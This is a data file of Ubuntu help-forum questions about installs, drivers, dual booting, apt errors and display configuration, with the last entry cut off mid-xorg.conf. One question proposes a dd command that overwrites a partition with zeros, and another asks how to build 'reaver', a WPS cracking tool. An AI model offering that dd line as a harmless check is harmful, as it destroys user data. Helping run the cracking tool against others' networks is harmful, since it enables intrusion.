109585	quota format not supported in kernel	i 'm trying to configure quota for my / mount on ubuntu 11.10 . i have added , usrjquota=quota.user , grpjquota=quota.group , jqfmt=vfsv0 to it in fstab . made mount -o remount / and quotacheck -avugm . but when i try to turn quota on quotaon -avug i get this messages : quotaon : using //quota.group on /dev/xvda1 [ / ] : no such process quotaon : quota format not supported in kernel . quotaon : using //quota.user on /dev/xvda1 [ / ] : no such process quotaon : quota format not supported in kernel . as i understood googling , that ubuntu kernel could be compiled without quota support . any ideas ? thanks !
109588	python : os.system does not execute shell comand	i need to execute shell command in python program ( i have ubuntu ) . more specifically i want to create graph using graphviz in python script . my code is os.system ( `` dot -tpng graph.dot -o graph.png '' ) it does not work , but if i just type dot -tpng graph.dot -o graph.png in command line then everything is fine . do you know what the problem ? thank you ! edit : does not work means that nothing happens , there are no errors . output from dot -v -tpng graph.dot -o graph.png : dot - graphviz version 2.26.3 ( 20100126.1600 ) activated plugin library : libgvplugin_pango.so.6 using textlayout : textlayout : cairo activated plugin library : libgvplugin_dot_layout.so.6 using layout : dot : dot_layout using render : cairo : cairo using device : png : cairo : cairo the plugin configuration file : /usr/lib/graphviz/config6 was successfully loaded . render : cairo dot fig gd map ps svg tk vml vrml xdot layout : circo dot fdp neato nop nop1 nop2 osage patchwork sfdp twopi textlayout : textlayout device : canon cmap cmapx cmapx_np dot eps fig gd gd2 gif gv imap imap_np ismap jpe jpeg jpg pdf plain plain-ext png ps ps2 svg svgz tk vml vmlz vrml wbmp x11 xdot xlib loadimage : ( lib ) eps gd gd2 gif jpe jpeg jpg png ps svg
109590	ubuntu not displayed in windows boot manager	i have clearly seen v2r 's link . thanks for your help too . but my problem is different . i am trying to dual boot windows and ubuntu after installing with wubi . i downloaded an iso , burnt it and clicked wubi.exe in the cd . i suspect that wubi has n't put a list in boot manager . because i do n't see ubuntu in boot manager or msconfig in windows . it is after these repeated failures i tried to install ubuntu by booting into my cd . but i was taken aback when it gave me no option saying `` install with windows '' .this was mentioned in all tutorials . so i had to chose `` something else '' in the setup dialog . then another problem came up -- - i was n't able to install inside any ntfs partition . it showed : `` no root file system defined '' . i had to quit . so i would like to know a solution . i beg you to help as i love ubuntu . please : - )
109591	removing evolution password under kde ?	i 'm using evolution mail client under kde . i want to get rid of entering my password each time i use it . how can i do that ?
109596	can i use dd to verify unpartitioned disk surface ?	the thing is , i bought a laptop and after 6 days of hdd uptime , the smart reports `` 449 reallocated sectors '' already . with number slowly , but constantly climbing . my hd is 320gb in size , with only 100gb allocated , which are used by ubuntu installation . i would like to check the rest of the 220gb for bad sectors , so that i could rma the disk if there are even more reallocations , but i do n't know how to do it , being a linux newbie . the un-partitioned space seems to be /dev/sda3 , so i was thinking about dd if=/dev/zero of=/dev/sda3 , but i 'm not sure if that wo n't wipe some critical partition table data or something . can anyone recommend me what i should do ?
109598	remove launcher in unity 2d ?	i like unity but i 'd rather use docky as a launcher than the unity launcher . is it possible to remove the launcher in unity 2d or possibly preventing it from loading at start-up ? thanks
109600	how can i close the lid on my hp pavilion g7 running ubuntu 11.10 without crashing it ?	if i close the lid on my computer while it 's running , it goes into sleep ( hibernation ? ) mode . when i open back it up , the screen wakes up for a moment , then goes black . the computer is unresponsive and i must hard boot o avoid . i 've tried the following solutions . neither worked : edit xorg.conf replace gnomescreensaver with xscreensaver i 'm not sure if this is related , but i had issues with the videocard on the laptop during install which i described here : http : //askubuntu.com/a/105792/46766 if you know of a reasonable solution , please share it with a short explanation indicating why you believe it will be effective . thanks in advance .
109618	unable to login to super user from normal user	i have installed ubuntu 11.10 with no problem . but after login as a normal user , i am unable to switch to super user ( using `` su '' command ) . its showing `` authentication failure '' plz help me..
109626	how do i know my kde version ?	i 'm on kubuntu 11.04 and i want to know what kde version i 'm using .
109627	how to set up virtualization servers ?	i have 2 pcs that i wish to setup as virtualisation servers . one has an i7 cpu and another one that does n't support hardware virtualisation . can someone give me instructions to configure it ? if i can have a web ui to control the virtualisation it would be great . these server will only be used for virtualisation so multiple desktop could be setup and used from the network .
109631	how does ubuntu cloud guest and amazon web services work ?	could you explain me what i can do with ubuntu cloud and amazon cloud ( amazon ec2 ) . how are they usefull . can i use it like a real pc or it is only like a simple cloud wich can i put some files or maybe a site ? i 'm confused about their use .
109633	changing the priority of gnome shell	i want to give gnome-shell the highest priority , but i could n't change the priority on the system monitor , an error messeage says : ca n't change priority 's process with pid 2841 to -5 . access denied i tried the following commands : gksu gnome-system-monitor but i ca n't find gnome-shell on the processes list , so i tried `` renice command '' , like this : sudo renice -15 2841 and finally got this problem , the gnome-shell 's pid always changes , it 's not the same pid numbers , so i have to change the priority every time i start up my system . can anyone help me ? thanks .
109635	wrong keyboard map	i have ubuntu 11.10 . i have an english keyboard and have set the keyboard layout to english ( uk ) in the system settings - > keyboard layout . it is the only layout listed . recently my keyboard has gone to us layout . i do n't know why and i can not change it back . the `` and @ are in the wrong place . i 've typed man loadkeys and the documentation tells me that the default keymap is probably in a file called defkeymap.map either in /usr/share/keymaps or in /usr/src/linux/drivers/char . i can find neither of these directories . can anybody tell me where the defkeymap.map file is in my distribution , or if it is there at all ?
109641	top panel black again after i set the transparency	in unity i set panel opacity to transparent , then i do the following : open workspace switcher drag a full screen window to another workspace twice and the top panel change black .
109646	how to enable hibernate in 12.04 ?	i just installed the new 12.04 beta on my lenovo ideapad u450 . according to this thread whither hybrid suspend ? hibernate and suspend are supported , but in the power settings the option to hibernate is greyed out e.g . for what to do when closing the lid . how can i enable it ? my goal is , that if suspend to both is not supported a behaviour something like , suspend to ram and when battery is low , suspend to disk . is this possible ? /kind regards christian
109651	use photoshop in virtualbox , is it worth the hassle ?	i 've been planning to switch to ubuntu as my main os and i 'd like to do it now with precise . i am a web developer and the only app i am tied to in windows is photoshop and ie . the grand plan is to install windows 7 with photoshop in virtualbox . the question is , would it be wise to do so ? i 've never tried it before and i 'd like to ask any professional advice .
109652	how to enable hibernate in 12.04 ? ( again )	i just installed the new 12.04 beta on my lenovo ideapad u450 . according to this thread whither hybrid suspend ? hibernate and suspend are supported , but in the power settings the option to hibernate is greyed out e.g . for what to do when closing the lid . how can i enable it ? my goal is , that if suspend to both is not supported a behaviour something like , suspend to ram and when battery is low , suspend to disk . is this possible ?
109654	amd radeon 6470m not supported , what 's next ?	i just installed ubuntu 11.10 , first time linux yay . when i boot into ubuntu , everything seems to work fine for a few seconds , but then my computer starts to make lots of noise and it shuts down . i did some research and it is probably because my graphics card is not supported : amd radeon 6470m . i found a few solutions here and there , but i ca n't do anything in ubuntu because my laptop shuts down after a few seconds . what can i do ? should i boot without gui or something ? do i have to buy a new graphics card that is supported ? i 'm a total noob when it comes to linux so please answer in a very specific way . sometimes i read answers like 'pass video=640x480 into the kernel ' , i do not know how to do stuff like that . please help me , using windows any longer will make me cry : (
109657	setting up samba really that easy ?	i set up an ubuntu-server and installed samba . i set the `` interfaces '' option in the .conf-file to `` lo eth0 '' . my question is according to the security of this system : am i done with the setup process ? do i need additional things to make my system safe ? most of the samba-how-to 's stop at this point . i only want to access the fileserver from lan . it is behind a `` fritzbox '' .
109658	partitioning questions	i 'm new to ubuntu/linux and i 'd like to create a similar partitioning situation as i had on my old windows machine : i have one hd of 640gb , split up in 2 partitions : 100gb and 540gb the first one was dedicated to the os and software the second one for storage of personal/media files . can someone please explain in laymen 's terms what i exactly have to do to create a similar situaton in ubuntu ? many thanks in advance for your guidance !
109660	close gnome session from console	i use ubuntu 11.10 64 bits with gnome shell . i have opened a bug because sometimes `` close session '' and `` shutdown '' buttons does n't work . gnome-session-quit only works sometimes : bug how can i close the session cleanly from console without gnome-session-quit ?
109664	how to reset all ntfs partitions back to default ( read/write ) state ?	i ca n't copy any file or folder to my ntfs partitions , but i can copy from them to my home . i think that all of them has been changed to read only state after i make changes in some partitions using gparted . so what to do to reset them to read/write state again ? ? ?
109671	useful sites for ubuntu offline user ?	i want to know useful site for offline user who there is know internet connection but they use ubuntu . i mean the site to download offline software packages .
109673	how to use `` apt-get '' via `` http-proxy '' like this ?	i 'm trying to use apt-get command on a network that uses a proxy , like this : we use 10.114.7.7 on port 80 as http-proxy , and after that an authentication window comes up , asking for user name and password . our username/domain is like this : username @ urmia.ac.ir i 'm wondering , how i can use http_proxy=http : //user : pass @ proxyserver : port in this situation ! ? i also tried both , 10.114.7.7 and urmia.ac.ir as proxy server but no result !
109674	how to uninstall ubuntu 10.10	i felt i will get two operating systems ( windows xp installed ) when i install ubuntu 10.10 it displays only ubuntu i 'm not getting my previous os . please tell me how to uninstall ubuntu 10.10 and to get my previous os .
109679	how do i get my mp3 and video codecs ?	i 've recently replaced my hdd , and installed lucid lynx , but while setting up my environment i realized that i ca n't play mp3 's or video files . my computer tries to download plugins , but keeps giving me the following error : e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the download directory someone please help .
109681	which process is using nvidia module ?	i 've got bumblebee 3.0 installed , i started chromium-browser with optirun and although i have closed chromium off , the card is still on . how can i know which process is using nvidia module that prevents the card from switching off ? root @ magneto : / # cat /proc/acpi/bbswitch 0000:01:00.0 on root @ magneto : / # root @ magneto : / # tee /proc/acpi/bbswitch < < < off off root @ magneto : / # cat /proc/acpi/bbswitch 0000:01:00.0 on root @ magneto : / # dmesg |tail -1 [ 92040.608982 ] bbswitch : device 0000:01:00.0 is in use by driver 'nvidia ' , refusing off root @ magneto : / #
109690	problems installing cinelerra	bonjour , j ' ai essayer par tous les moyens pour installer cinelerra par internet , par le terminal je n ' arrive pas ă installer cinelerra ! pouvez-vous m ' aider . merci hello , i have tried to install cinelerra both through the internet and the terminal , but i have not been successful . can you please help me ! thank you
109696	gvim always opens in workspace # 4	i 'm a windows guy who recently switched to ubuntu ... i use gvim for programming . every time i launch gvim from the applications menu or from the right-click context menu , it opens in workspace # 4 , no matter what workspace i 'm in ( usually i 'm just in # 1 , still getting used to that concept ) . if i run gvim from a terminal , it stays in the same workspace , so i 'm guessing this has something to do with the unity desktop ( ? ) how can i make gvim open in the current workspace ?
109701	windows on ssd ; ubuntu on hdd	in my system i have a 120gb ssd and a 1tb hdd . i have windows 7 installed on the ssd and i partitioned the hdd in 2 partitions on for windows programs and files . and one for ubuntu . but after i installed ubuntu beside windows 7 , grub has n't recognized my windows 7 install on ssd . what can i do now to be able to access/boot windows 7 again ?
109709	hurricane ipv6 buffer space error	i am trying to set up a hurricane ipv6 tunnel on my ubuntu 11.10 computer . i have set up my /etc/network/interfaces file as stated on https : //wiki.ubuntu.com/ipv6 # get_connected_with_hurricane_electric . my /etc/network/interfaces file is the following : auto lo iface lo inet loopback auto he-ipv6 iface he-ipv6 inet6 v4tunnel endpoint 209.51.161.14 address 2001:470:1f06:6 : :2/64 netmask 64 up ip -6 route add default dev he-ipv6 down ip -6 route del default dev he-ipv6 when i try to start ipv6 by running sudo ifup he-ipv6 , i receive the following : add tunnel sit0 failed : no buffer space available failed to bring up he-ipv6 . i have double checked that the data i entered from hurricane is correct . what is causing this problem , and how can i fix it ?
109717	install tomcat on ubuntu 11.04	i tried installing tomcat on 11.04 using apt-get install tomcat7 but i get an error : unable to locate package tomcat7 i guess there 's no tomcat7 package available for this distro . i tried enabling backports by adding the following to /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu natty-backports main restricted universe multiverse but i still get the same error .
109724	how to change drive letter ?	i have dual boot ( windows 7 and ubuntu 11.04 ) i removed the system reserved partition letter from windows ( desk management ) and it ended for me with grub rescue terminal . i think this means fail to find boot of both windows and ubuntu so how do i change back the letter ? i prefer gui more than terminal . the content of the system reserved partition did n't change so its only how will i change it back and i do n't want to loose my system . i 'm using ubuntu live cd now . i 've read the old post here but it does n't help me
109728	how do you get `` reaver '' to run ?	i found directions on this site , on how to do this , but it wo n't work for me . the echo i get is a syntax error i used the commands , that came with these directions as followed : you need to install libpcap*-dev first : sudo apt-get install libpcap*-dev extract the tar file , then from the terminal : cd /path/to/src the use the following commands : ./configure -- prefix=/usr make sudo make install after i typed make it said [ libwps.o ] error 2 . then when i typed sudo make install , it said install error 1 .
109731	first time ubuntu intel gma3150 on nb30 plus	i have intel atom n450 and intel gma3150 when looking in system info it says unknown for the gpu and youtube videos above 360p laag very bad compared to windows xp 720p was smooth . i do n't know much about linux this is like the first step i have taken to try and use linux rather than windows . please can some one help me out and explain what i have to do . ~ $ lspci -nnk | grep -a2 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation n10 family integrated graphics controller [ 8086 : a011 ] subsystem : samsung electronics co ltd device [ 144d : c073 ] kernel driver in use : i915
109733	what virtual keyboards are available which are most touch-friendly ?	i 've installed the 12.0.4 beta on my dell latitude xt2 and although i can navigate dash with my fingers , but the onboard onscreen keyboard does not pop up when i want to search for applications in dash . i 've also tried caribou but it gets in the way far too much , it pops up when i want to input in the url bar in firefox but does not go away when i want it to ! i would also try florence if it was n't a dependency hell to compile it .
109734	update problem 11.10	whenever i try to install any software through terminal or software on my ubuntu 11.10 , i 'm getting this response : failed to download repository information check your internet connection . please help me ,
109735	dual boot and partitions	first of all , i 'm really sorry for this question , i know there are tons of information on the web covering this , but i really need to get this right this time , as it 's the 3rd time i installed windows and ubuntu and now i do n't want to go through this again ... here 's : the rundown of my last failed install : within windows 7 installer - cleaned my new 500gb disk - created a partition for windows 150 gb - created a partition for linux - 100 gb - created a partition where i hope to install osx in the future ( 100gb ) - created a partition with the rest ( around 140gb ) where i hope i will keep everything i want to share between oss installed windows ( that created that 100mb system partition ) installed linux - only had two options : replace windows or advanced - i chose advanced - only the 150gb windows partition showed allocated , all the rest was `` free '' - created a swap partition of 2gb for swap - created a root partition of 100gb , and installed linux there the result was disastrous : linux was fine , but i got blue screen when booting windows windows installation did n't recognize my hard drive any more i had to run linux installation again , reformat the harddrive , cancel the installation so windows would recognize it again ... so , now : i deleted the linux partitions in windows installation createa a partition of 150gb for windows installed windows installed linux , with the previously unavailable option ( alongside windows ) everything went well , i have both systems running what i need i want the same partitioning setup , i described in the beginning : - a partition for windows 150 gb - a partition for linux - 100 gb - a partition where i hope to install osx in the future ( 100gb ) - a partition with the rest ( around 140gb ) where i hope i will keep everything i want to share between oss i just need to know , exactly what i need to do and how to do it , in a way that nothing goes wrong , and i do n't have to go back to square 1 . thanks for your time , much appreciated
109740	how do i stop the mouse from `` sticking '' to the screen edges with multiple monitors ?	my mouse always hangs when moving it from one screen to the other , is there a possibility to disable this ?
109745	ubuntu multiple issues ( blank screen )	computer specs i am having difficulties , to get ubuntu 11.10 to work . for the 11.10 version , if i click install , or if i click try ubuntu , i only get a blank screen , that just stays there . if i use `` nomodeset '' , it changes to a loading screen and after about 2 minutes it goes back to black screen - however , before it goes black , i get a few errors , like : bad target number , or passwd error mode ( something like that ) . i 've also tried ( xforcevesa , i915.modeset=0 , nomodeset , radeon.modeset=0 , i915.modeset=1 ) i have also tried the alternate installation , which installed fine , however when i boot up , select it from `` grub '' , it goes black . i did manage to install 10.04 , however the screen resolution was 800x600 and i could n't fix it to 16:9 ( my resolution ) . i do n't wan na use 10.04 , because i would like the new one 11.10 , and would like to use it . any help would be greatly appreciated . thank you
109750	is it possible to do an upgrade without having to answer questions ?	i did a update-manager -d and since it is asking if i should replace or leave several files like for example the mysql conf file . do i have an option to tell it to upgrade everything no questions asked . something like a silent install or to have everything automatic .
109751	how can i convert stereo audio to binaural ?	i have looked around and i came across ( b2sb ) and well its not clear how to install it . it also mentions there that it is used in mplayer but i ca n't see how . so how do i go about installing it ? as a further extension , i 'd like to have virtual 5.1 on my headphones . i know dolby headphone does this and there 's a foobar2000 plugin in windows but that applies to audio only . there is the hrtf implementation of mplayer but there 's lots of crackles and pops when its enabled .
109754	update to 11.10 without touching the kernel ?	there is some method to upgrade my ubuntu 11.04 without touching the kernel ? , is that branch 3.x kernel gives me problems bluetooth makes my system freeze , and with the current kernel ( 2.6.38-13 ) is luxury all my hardware . i write from the google translator because my english is poor
109760	flash plugin crashes after 1 second of audio or video playback	this happens in all browsers , only for flash objects with multimedia content . non-multimedia flash objects work just fine , until i try to access the settings , at which point the whole object becomes unresponsive ( but does n't give me an error about crashing ) . i was also having problems with my audio drivers today ; i 'm not sure if that 's related . i fixed those problems by following these instructions , ending with this command : sudo aptitude -- purge reinstall linux-sound-base alsa-base alsa-utils linux-image-`uname -r` linux-ubuntu-modules-`uname -r` libasound2 i 've tried basically everything i can think of as well as everything suggested in forums , blogs , etc . and now i 'm at my wits ' end . anybody know what 's going on or how i can fix it ? any help is greatly appreciated .
109766	monitors not detected after installing nvidia drivers	i 've recently installed ubuntu 11.10 to my pc . i 've have windows 7 on it as well . when i first started up ubuntu , it detected both of my monitors . i then updated the drivers and restarted , but when i restarted , ubuntu does n't detect the monitors anymore . i 've removed and reinstalled the drivers but that does n't work . whenever i boot in windows 7 , windows still detects both monitors , so i know it 's not the cables . it has to be the drivers or ubuntu . my question is , what do i need to do to get this fixed ? i 'm new to linux by the way . display adapters : nvidia geforce 8800 gts 512 . i went to system settings/additional drivers and then activated nvidia accelerated graphics driver ( version current ) [ recommended ]
109768	how can i get apt to ignore unmet dependencies ?	my apt-get is currently complaining about unmet dependencies ( and refuses to do anything until i fix them ) : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libavcodec53 : depends : libva1 ( > 1.0.12~ ) but 0.31.1-1+sds4 is installed libva-dev : depends : libva1 ( > = 1.0.12 ) but 0.31.1-1+sds4 is installed libva-glx1 : depends : libva1 ( > 1.0.12~ ) but 0.31.1-1+sds4 is installed libva-tpi1 : depends : libva1 ( > 1.0.12~ ) but 0.31.1-1+sds4 is installed vainfo : depends : libva1 ( > 1.0.12~ ) but 0.31.1-1+sds4 is installed e : unmet dependencies . try using -f. the thing is , i absolutely need that specific version of libva1 . anything newer does n't work with mplayer-vaapi . the purported unmet dependencies do not seem to have any negative effects on my system ( other than breaking apt ) , so is there any way i can make apt-get ignore them and just do what it 's told ?
109771	how do i/is it possible to remove the broadcast option from the messaging indicator ?	i would like to remove an applet from the gnome panel/indicator applet ( the gwibber/broadcasting applet , to be precise ) in unity mode . is this possible ? if so , would any techniques also apply to other applets that other programs may place there ?
109772	libreoffice calc goes grey takes lots of cpu cycles	when working on the calc ( spreadsheet ) many time the screen goes grey and cpu cycle shoots up to 100 % for a very long time and the app is not responsive . also slows down other open apps etc due to cpu being at 100 % . is there anyway this can be avoided ? the file size does n't really matter as it happens with having only one sheet with simple data as well as file with several sheets and calculations . running ubuntu 11.10 on a dell inspiron 1300 with 2 gb ram and intel celeron 1.5 ghz cpu . long time sometimes over 2 mins . i have n't used top but can give it a try if i knew what it is changing the graphic cache user for liberoffice did not really change anything .
109774	how do i get a wiimote working ?	in kernel 3.1 the drive for the wiimote was added . since 3.2 i ask , can i connect the wiimote and simply have access to it or do i need to install a program for it or something additional for it .
109779	i 've got internal error whilst running a ubuntu beta . how to gather information and find out what it is ?	today , i was running the ubuntu beta ( ubuntu 12.04 ) and it experienced an internal error . i know i should file a bug report . however , i want to go check more detailed in the log files , but where are they located on my system ? although , i did n't enable core dump before . i just checked , there is no core dump file right now .
109788	how do i get the ultimate ubuntu home system ?	good day , i am relatively new the ubuntu world but i am loving it . i am a huge supporter of open source software , open access , and anything that can relate to these concepts . i am tired of paying big industry boodles of money for stuff that i can not even really do what i want . so , this is my question ( s ) . how do i create the ultimate ubuntu home system ? maybe open source would be a better use as i am new to this area , there might be something better for this than ubuntu . let me explain what it is that i want to do . please remember that although i am new to this area , i am a do-it your self kind of person , so a lot of work to get what i want does n't bother me . i want a sweet customizable entertainment system . i see there are things out there like mythtv for recording shows . i want to be able to do that , but i also want to be able to access an external hard drive that has digital movies on it , music , photos , and who knows what else . i want to be able to watch internet tv shows and youtube without the stupid blocks that come on google tv and xbox where it wo n't let you watch some videos . i want it to be networked with other devices in my house and have a home server storing all of this information in one spot so it accessible even without an internet connection . if i can get it to work with lighting and other electronics that would be great . perhaps there are some other things out there that i am not even aware of ... as i said , i 'm new . i have a lamp server running on my laptop locally and it was pretty easy to set up . i am working on numerous open source softwares that require that server so i am somewhat familiar with it . i am really looking for a cool do it all kind of system that runs through out the whole house , has central storage , and customizable interfaces for each specific job . i hope i am making myself understood . please feel free to ask any questions and i look forward to reading your posts ! thanks !
109793	apt-daemon problem due to a broken sun-java6-jre package	i am having problems with installation with everything in the software center . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the sun-java6-jre package . this might mean you need to manually fix this package . help ?
109797	ubuntu installation on imac	i have an imac configured as follows - screen 27 '' cpu 3.4 ghz i7 graphics amd radeon hd 6970 1024 mb i downloaded ubuntu version 11.10 64 bit iso and burnt that to both dvd and usb stick as per the instructions on ubuntu 's download page . neither will boot . symptoms are as follows - dvd : when the imac is restarted and booted from dvd ( labelled windows which is n't mentioned in ubuntu 's website instructions ) one line is displayed against a black screen displaying a message about the developer and date . after 5 minutes the message hangs and the dvd ceases to spin . usb stick : strangely i have to select the efi boot cd icon which appears after holding down the alt key . a text menu appears offering me to try ubuntu without installing . i select this and the screen goes blank and stays blank . any ideas ? lastly , after writing ubuntu to dvd and usb stick , neither could be read by osx making the instructions to eject them as per ubuntu website 's instructions useless . this might help ? thanks , shane .
109805	why do some packages require other seemingly optional semi-related packages ?	desktop environments seem to be the biggest culprits . i have gnome3 and want to remove its default epiphany browser because i prefer chromium . this , however , requires uninstalling gnome3 itself . same thing with gdm even though i use lightdm .
109807	how do i start the graphic interface ?	i just installed the new ubuntu and i get stuck after i enter my username/password the screen is in black background and white letters it says : ubuntu precise ( development branch ) localhost tty1 localhost login : myusername password : ******** everything is okay , next message : welcome to ubuntu ... myusername @ localhost : ~ $ _ i tried to type startx but still not working , how do i open the interface ? command ?
109811	adjust brightness and contrast on an acer aspire as5750 ?	i have an acer aspire as5750 . with the intel hd 3000 graphics . when i use the adjustment function keys the dial moves but it does n't translate to the screen diming . same with the dial in linux settings . also in colour settings it seems there is no colour file or icc profile available for this laptop . do you think if i can get a working icc profile then it will fix this or not ? i have found something that could work : argyll but it looks complicated to use , has anyone here used it ? would it allow me to dim ? or is there any other work around ? i have searched lots but ca n't find a solution .
109818	possibly buying a used desktop computer ?	i have a question about a desktop i am very interested in purchasing that i have found.it is a dual core 3.9g,350 gig hardrive , cooler master case and this lady says it has 8.8 gigs of ram ? i am taking a chance on it i know , in her ad she wanted 200 for it but when i called she dropped the price to 100.she says her husband used it at their company but upgraded to a newer system.my question is about the memory she claims is in it 8.8 gigs.i didnt know that physical memory read that way , lol.i m supposed to meet her tommorrow and i ve asked her about the psu , motherboard , socket and such but she claims she knows nothing about these things her husband does.if anyone can explain her memory interpretation to me it will make me feel a bit at ease.thank you
109820	alps loaded but ps/2 mouse also loaded !	i have dell inspiron 15r and i installed psmouse-alps package , it successfully recognized my touchpad and i can see touchpad option under mouse properties as well , but my touchpad does n't works at all . here is the output of xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=14 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=13 [ slave keyboard ( 3 ) ] the alpsps/2 is disabled but ps/2 mouse is enabled.if i disable ps/2 mouse it totally disables my touchpad as well ! ! is there any work around for this ?
109827	how can i delete windows after installing ubuntu via wubi ?	when i installed ubuntu from a cd the only option that seemed to work was to install within windows . did i get a faulty version of ubuntu or am i doing something wrong ? i 'm able to select between windows and ubuntu when i turn on or reset , but i do n't think that there is a real partition anywhere . gparted partition editor is only showing one partition that is being used and the rest as unallocated space . i 'd like to get rid of windows .
109838	fry 's fr-300 usb wlan driver	i have been searching all over the internet but i ca n't find any clues to where i could find a fry 's fr-300 usb driver . ( if it exists ) when i run lsusb the vendor and product # is 07d1:3304 . i ca n't find anything for it , and the closest thing i have found is : http : //comments.gmane.org/gmane.linux.redhat.fedora.general/388385 i 'm not sure what i 'm doing at this point so i ca n't install the firmware files or driver to test his find yet . can someone either help me out or link me to somewhere that would explain the process of installing these , or possibly a proven working driver ?
109842	error in running python scripts	i have python 2.7 installed and i 'm facing errors while trying to run scripts in python . the gui based launchpad app ground control ca n't start and is facing bugs . but even a simple program ca n't run : from urllib import urlencode from urllib2 import urlopen pg = urlopen ( `` http : //www.beans-r-us.biz/proces.html '' ) text = pg.read ( ) .decode ( `` utf8 '' ) where = text.find ( `` > $ '' ) start_of_price = where + 2 end_og_price = start_og_price + 4 price = float ( text [ start_of_price : end_of_price ] ) print `` the current price of coffee is : '' , price the error log is as follows : traceback ( most recent call last ) : file `` androidscript.py '' , line 4 , in < module > pg = urlopen ( `` http : //www.beans-r-us.biz/proces.html '' ) file `` /usr/lib/python2.7/urllib2.py '' , line 126 , in urlopen return _opener.open ( url , data , timeout ) file `` /usr/lib/python2.7/urllib2.py '' , line 400 , in open response = meth ( req , response ) file `` /usr/lib/python2.7/urllib2.py '' , line 513 , in http_response 'http ' , request , response , code , msg , hdrs ) file `` /usr/lib/python2.7/urllib2.py '' , line 432 , in error result = self._call_chain ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 372 , in _call_chain result = func ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 619 , in http_error_302 return self.parent.open ( new , timeout=req.timeout ) file `` /usr/lib/python2.7/urllib2.py '' , line 400 , in open response = meth ( req , response ) file `` /usr/lib/python2.7/urllib2.py '' , line 513 , in http_response 'http ' , request , response , code , msg , hdrs ) file `` /usr/lib/python2.7/urllib2.py '' , line 438 , in error return self._call_chain ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 372 , in _call_chain result = func ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 521 , in http_error_default raise httperror ( req.get_full_url ( ) , code , msg , hdrs , fp ) urllib2.httperror : http error 404 : not found anant @ anant-inspiron-n5010 : ~/documents $ someone please help me out with it .
109846	screen resolution and multiple monitors kubuntu 11.10 asus u46e bal7	i have just installed kubuntu on asus u46e bal7 . the installation went fine and i am able to use the desktop . but it seems to recognize only one monitor at a time , either the laptop or the secondary one and not both . besides this the resolution being shown is far less than the capability of either monitors . i was able to generate a xorg.conf file , but that seems to be mostly empty . i am skeptical about editing it and screwing up what 's working now . is there a way to dump existing configuration that kubuntu is using into a file , so i can work by modifying those settings as opposed to writing everything by hand ? please find my xorg.conf file attached below . thanks million in advance . section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' load `` dbe '' load `` dri '' load `` record '' load `` dri2 '' load `` extmod '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` dri '' # [ ] # option `` colorkey '' # # option `` videokey '' # # option `` fallbackdebug '' # [ ] # option `` tiling '' # [ ] # option `` linearframebuffer '' # [ ] # option `` shadow '' # [ ] # option `` swapbufferswait '' # [ ] # option `` triplebuffer '' # [ ] # option `` xvmc '' # [ ] # option `` xvpreferoverlay '' # [ ] # option `` debugflushbatches '' # [ ] # option `` debugflushcaches '' # [ ] # option `` debugwait '' # [ ] # option `` hotplug '' # [ ] # option `` relaxedfencing '' # [ ] identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg 